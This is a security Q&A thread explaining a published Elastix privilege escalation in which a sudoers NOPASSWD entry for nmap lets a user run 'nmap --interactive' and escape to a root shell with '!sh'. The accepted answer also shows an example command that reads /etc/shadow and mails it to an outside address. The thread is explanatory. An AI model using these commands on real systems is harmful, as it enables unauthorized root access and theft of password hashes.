# How does this privilege escalation vulnerability on Elastix work?

Tags: linux, privilege-escalation

Here is a privilege escalation vulnerability on Elastix:

```
# id
# uid=100(name) gid=101(name)
# sudo nmap --interactive

# Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
# Welcome to Interactive Mode -- press h <enter> for help
# nmap> !sh
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
```

How could a normal user start nmap with sudo privilege? What exactly is misconfigured here?

Source: http://seclists.org/fulldisclosure/2012/Mar/234

Answer (score 3, accepted):

The misconfiguration would come from either a group, or user entry in `sudoers.conf`. This is the file that controls who can do what (with regards to sudo). In this instance judging by your commands (if they were not edited) the `sudoers` file contains an entry for the user asterisk to run the sudo command without entering a password.

Now in the case of `nmap --interactive` - that was removed some time ago. There was an escape trick that someone could use while in `nmap` to abuse the system. E.g.:

```
nmap> !head -n1 /etc/shadow | mail -s shadow my@emailaddr.com
```

Answer (score 0):

If you are unable to view the sudoers file, you can also check which commands a user can execute as root with **sudo -l**. In the case above, you'd likely see something like the following:

```
 User x may run the following commands on this host:
 
     (root) NOPASSWD: /usr/bin/nmap
```